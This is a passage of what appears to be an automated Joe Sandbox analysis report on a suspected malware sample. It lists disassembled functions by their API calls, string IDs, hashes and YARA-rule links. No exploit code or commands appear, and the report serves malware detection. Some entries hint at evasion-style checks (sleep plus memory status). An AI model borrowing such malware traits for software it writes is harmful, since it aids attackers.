                                                                      • WNetUseConnectionW.MPR(00000000,?,?,00000000,?,?,00000100,?), ref: 0057B0F6
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: Connection__itow__swprintf__wcsnicmp_wcscpy
                                                                      • String ID: LPT
                                                                      • API String ID: 3222508074-1350329615
                                                                      • Opcode ID: f9cf2916a4ae14c1387599cd1d19016e6c541a62900c3b32f1405360e3689ffc
                                                                      • Instruction ID: ba9ef0ba6d9d24cdad775d1417930f7335b8f8ee30c1de36add27fbfe002b0ed
                                                                      • Opcode Fuzzy Hash: f9cf2916a4ae14c1387599cd1d19016e6c541a62900c3b32f1405360e3689ffc
                                                                      • Instruction Fuzzy Hash: 6B618475A00215AFDB14DF94D895FEEBBB4FF48310F108069F91AAB291DB70AE84DB50
                                                                      Function 00522957 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 144sleepCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • Sleep.KERNEL32(00000000), ref: 00522968
                                                                      • GlobalMemoryStatusEx.KERNEL32(?), ref: 00522981
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: GlobalMemorySleepStatus
                                                                      • String ID: @
                                                                      • API String ID: 2783356886-2766056989
                                                                      • Opcode ID: 8a29ec52b0720288f848b0e5511a9f88eeaada6174d47e0a039e4ec04f8d160e
                                                                      • Instruction ID: b2e3e9de4fbb074991e3ca47156070ff2ec2e73812aed15bee7f7fd54e6f20f8
                                                                      • Opcode Fuzzy Hash: 8a29ec52b0720288f848b0e5511a9f88eeaada6174d47e0a039e4ec04f8d160e
                                                                      • Instruction Fuzzy Hash: E0513771408745ABE720EF10D88ABEBBBE8FBD5344F41895DF2D8410A1DB3095A9CB66
                                                                      Function 00579734 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 138COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 00514F0B: __fread_nolock.LIBCMT ref: 00514F29
                                                                      • _wcscmp.LIBCMT ref: 00579824
                                                                      • _wcscmp.LIBCMT ref: 00579837
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: _wcscmp$__fread_nolock
                                                                      • String ID: FILE
                                                                      • API String ID: 4029003684-3121273764
                                                                      • Opcode ID: 563c61656339bbf41e5ada0896cf01bf9ff704bb641bfc629d96b7bbc58a7ac1
                                                                      • Instruction ID: 38754e05eaa38ccf627a78fe6b74f4b93f0206121246ec1d80c1cef5b5d788d1
                                                                      • Opcode Fuzzy Hash: 563c61656339bbf41e5ada0896cf01bf9ff704bb641bfc629d96b7bbc58a7ac1
                                                                      • Instruction Fuzzy Hash: F141B571A0021ABADF209EA4DC49FEFBFBDFF85710F004469F904A7281DA719A45DB61
                                                                      Function 00550574 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 115COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: ClearVariant
                                                                      • String ID: Dd]$Dd]
                                                                      • API String ID: 1473721057-843470525
                                                                      • Opcode ID: f7eacda2131b6b411a8f3e1d73dce84bbf656118440c59db1be31b7f2f717ac5
                                                                      • Instruction ID: bed7f3b3a51d14bbc76d9cb7699b7bfd203ef9627df3717ba4af8833493adabc
                                                                      • Opcode Fuzzy Hash: f7eacda2131b6b411a8f3e1d73dce84bbf656118440c59db1be31b7f2f717ac5
                                                                      • Instruction Fuzzy Hash: 2A5105786063419FEB61CF18C494A5ABBF1FB99350F54881EE8858B361D371EC86CF42
                                                                      Function 0058258E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 97networkCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • _memset.LIBCMT ref: 0058259E
                                                                      • InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 005825D4
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: CrackInternet_memset
                                                                      • String ID: |
                                                                      • API String ID: 1413715105-2343686810
                                                                      • Opcode ID: cd26b59c5d713cece4c34ed06184af26e4b6e4335c297cdb40adfe0493736d31
                                                                      • Instruction ID: 55aff87e18e90512d9a13b2bc1d1bbb2cffb69309c4272528d5422454936c992
                                                                      • Opcode Fuzzy Hash: cd26b59c5d713cece4c34ed06184af26e4b6e4335c297cdb40adfe0493736d31
                                                                      • Instruction Fuzzy Hash: A531F87180011AABDF11AFA5CC89EEEBFB8FF48310F100059FD15B6162EA315996DB60
                                                                      Function 00597A71 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 97windowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • SendMessageW.USER32(?,00001132,00000000,?), ref: 00597B61
                                                                      • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00597B76
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend
                                                                      • String ID: '
                                                                      • API String ID: 3850602802-1997036262
                                                                      • Opcode ID: b339f63fd45008e9567fbf250a189c6ce8d1f9b8c51c78ca0463591c62b24f93
                                                                      • Instruction ID: e4336c8abf9248ec849b93c778de5d74fc0ee7ecaba08f8b3f46be67afc91813
                                                                      • Opcode Fuzzy Hash: b339f63fd45008e9567fbf250a189c6ce8d1f9b8c51c78ca0463591c62b24f93
                                                                      • Instruction Fuzzy Hash: CC41E674A1520A9FDF14CF68C981BEABBB5FB09300F14056AE904AB391E770AA55DF90
                                                                      Function 00596A63 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • DestroyWindow.USER32(?,?,?,?), ref: 00596B17
                                                                      • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 00596B53
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: Window$DestroyMove
                                                                      • String ID: static
                                                                      • API String ID: 2139405536-2160076837
                                                                      • Opcode ID: 2369c4686f8810cdef1faed032beffa4db40da51aeec1fbb6ab75d349bf6e3d0
                                                                      • Instruction ID: 71983af934df8644fe09451062709ca94333e47dcaa4274c9938113c306fddd3
                                                                      • Opcode Fuzzy Hash: 2369c4686f8810cdef1faed032beffa4db40da51aeec1fbb6ab75d349bf6e3d0
                                                                      • Instruction Fuzzy Hash: FF316D71200604AEEF109F64DC81BFB7BA9FF88760F11861AF9A9D7190DA31AC95D760
                                                                      Function 005728A2 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 88windowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • _memset.LIBCMT ref: 00572911
                                                                      • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 0057294C
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: InfoItemMenu_memset
                                                                      • String ID: 0
                                                                      • API String ID: 2223754486-4108050209
                                                                      • Opcode ID: a04def03a9bf71db9cb7cab950706417fd412dbef73cb6c364d0e61dafb061d2
                                                                      • Instruction ID: 759119299f02f742d737bcfe5e8677ad8a7f1a3cf9a747696bde6f6386eddf6f
                                                                      • Opcode Fuzzy Hash: a04def03a9bf71db9cb7cab950706417fd412dbef73cb6c364d0e61dafb061d2
                                                                      • Instruction Fuzzy Hash: 9731E631A003059FEB24CF58E845BAEBFF8FF45350F188419EA89A61A0D7709984EB51
                                                                      Function 005966D4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72windowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00596761
                                                                      • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 0059676C
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend
                                                                      • String ID: Combobox
                                                                      • API String ID: 3850602802-2096851135
                                                                      • Opcode ID: dd08c3ea93ebd58cd5da592091ef1b11ae29ceadbcb5f2e8a830e6d8d2324a63
                                                                      • Instruction ID: ac8b63e83f84213f869b6ae856bbf012599cc99207ae1637a485915a66a4207d
                                                                      • Opcode Fuzzy Hash: dd08c3ea93ebd58cd5da592091ef1b11ae29ceadbcb5f2e8a830e6d8d2324a63
                                                                      • Instruction Fuzzy Hash: D611BF71200209AFEF218F94DC84EFB3B6AFB883A8F110129F91897290D675EC5597A0
                                                                      Function 00596C07 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 68COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 00511D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00511D73
                                                                        • Part of subcall function 00511D35: GetStockObject.GDI32(00000011), ref: 00511D87
                                                                        • Part of subcall function 00511D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00511D91
                                                                      • GetWindowRect.USER32(00000000,?), ref: 00596C71
                                                                      • GetSysColor.USER32(00000012), ref: 00596C8B
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: Window$ColorCreateMessageObjectRectSendStock
                                                                      • String ID: static
                                                                      • API String ID: 1983116058-2160076837
                                                                      • Opcode ID: 0f6f75e5cde3f9c8eace3fb61229ad48f03e61eb409ec796d6551bfb4027f74f
                                                                      • Instruction ID: 2a3005c29531c1b752760d7afa76c6b1dfcadc4c7eb5882d66ac66b5f81cac10
                                                                      • Opcode Fuzzy Hash: 0f6f75e5cde3f9c8eace3fb61229ad48f03e61eb409ec796d6551bfb4027f74f
                                                                      • Instruction Fuzzy Hash: 5921267662020AAFDF04DFA8CC45EEA7BA8FB08314F114629F995D2250E735E864DB60
                                                                      Function 00596920 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 64windowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetWindowTextLengthW.USER32(00000000), ref: 005969A2
                                                                      • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 005969B1
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: LengthMessageSendTextWindow
                                                                      • String ID: edit
                                                                      • API String ID: 2978978980-2167791130
                                                                      • Opcode ID: f3bcf810217fa31090dda183f943197991a753774b0cf26456538943ca0b2c7c
                                                                      • Instruction ID: e82d58a104aea49e4373f961aeeb24b234df0d9d326600c1e7b1807637012fbe
                                                                      • Opcode Fuzzy Hash: f3bcf810217fa31090dda183f943197991a753774b0cf26456538943ca0b2c7c
                                                                      • Instruction Fuzzy Hash: B8118871100208ABEF108F64DC84EEB3BA9FB153B8F614724F9A5971E0C735DC98AB60
                                                                      Function 005729AF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63windowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • _memset.LIBCMT ref: 00572A22
                                                                      • GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 00572A41
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: InfoItemMenu_memset
                                                                      • String ID: 0
                                                                      • API String ID: 2223754486-4108050209
                                                                      • Opcode ID: 42151d993736bea06f77cee2be294086e0792844d909f0ad887061e855fe12d5
                                                                      • Instruction ID: b528e996ab15f985d29bbf3012b46e711ccdcebce991979bc3d3f432df80147d
                                                                      • Opcode Fuzzy Hash: 42151d993736bea06f77cee2be294086e0792844d909f0ad887061e855fe12d5
                                                                      • Instruction Fuzzy Hash: 5611B632D01114ABDF31DB5AEC44BAA7BB8BB45310F158026E95DE7290E7B0AD0AE791
                                                                      Function 005821D6 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62networkCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 0058222C
                                                                      • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00582255
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: Internet$OpenOption
                                                                      • String ID: <local>
                                                                      • API String ID: 942729171-4266983199
                                                                      • Opcode ID: f751b49b8e166e26fbb170b64061b63ee4f00f38495c32cdeb46658988410ebe
                                                                      • Instruction ID: 141b8862382fe8b314a06e6a425cafd9180422b276a457a0d928058e46a5ea6c
                                                                      • Opcode Fuzzy Hash: f751b49b8e166e26fbb170b64061b63ee4f00f38495c32cdeb46658988410ebe
                                                                      • Instruction Fuzzy Hash: 51110EB4501225BADB24AF518CC8EBBFFA8FF16351F10862AFD06A6000D2706894DBF0
                                                                      Function 0052092D Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 52COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00513C14,005D52F8,?,?,?), ref: 0052096E
                                                                        • Part of subcall function 00517BCC: _memmove.LIBCMT ref: 00517C06
                                                                      • _wcscat.LIBCMT ref: 00554CB7
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: FullNamePath_memmove_wcscat
                                                                      • String ID: S]
                                                                      • API String ID: 257928180-1618851650
                                                                      • Opcode ID: 7ae0467daaaa230898f0c6f8a528460e1749fcf437f23bf66c1ddfa43289638c
                                                                      • Instruction ID: 4b8ade007b75049128c5b829a2f6b12b3062b49b2e59539467d37f686a5910e3
                                                                      • Opcode Fuzzy Hash: 7ae0467daaaa230898f0c6f8a528460e1749fcf437f23bf66c1ddfa43289638c
                                                                      • Instruction Fuzzy Hash: 3611E53190521AAB9B10EF64D80AEDD7FF8BF4C350B0048A3B945D32C2EA7096C85B14
                                                                      Function 00568E05 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52windowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 00517DE1: _memmove.LIBCMT ref: 00517E22
                                                                        • Part of subcall function 0056AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0056AABC
                                                                      • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00568E73
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: ClassMessageNameSend_memmove
                                                                      • String ID: ComboBox$ListBox
                                                                      • API String ID: 372448540-1403004172
                                                                      • Opcode ID: 598c6f4c27e5d9c99999073933989238795b1366c2274f95fdef0ae7ce48550c
                                                                      • Instruction ID: 3450d158c25505eaaf6c6227f3bd0c217b0220fd10eabbdbaf60e61ac9dd251f
                                                                      • Opcode Fuzzy Hash: 598c6f4c27e5d9c99999073933989238795b1366c2274f95fdef0ae7ce48550c
                                                                      • Instruction Fuzzy Hash: 7B01F5B560121AAB9B14EBE4CC49DFE7B6CBF85320B000A19B831672D1EE315C48C650
                                                                      Function 00578D91 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 51COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: __fread_nolock_memmove
                                                                      • String ID: EA06
                                                                      • API String ID: 1988441806-3962188686
                                                                      • Opcode ID: 6313f35ca42506e33769b7e561dbb9574ebdb84b678d151eb3eea1a6890c7580
                                                                      • Instruction ID: c3b992aa99d3bdd8768da1321237ea5142530ac27cba51b725b9e5fcc6b8a795
                                                                      • Opcode Fuzzy Hash: 6313f35ca42506e33769b7e561dbb9574ebdb84b678d151eb3eea1a6890c7580
                                                                      • Instruction Fuzzy Hash: 9A01F9719042187EDB28CAA8C81AEFE7FF8EB11301F00459EF556D2181E874A6049760
                                                                      Function 00568CFD Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50windowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 00517DE1: _memmove.LIBCMT ref: 00517E22
                                                                        • Part of subcall function 0056AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0056AABC
                                                                      • SendMessageW.USER32(?,00000180,00000000,?), ref: 00568D6B
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
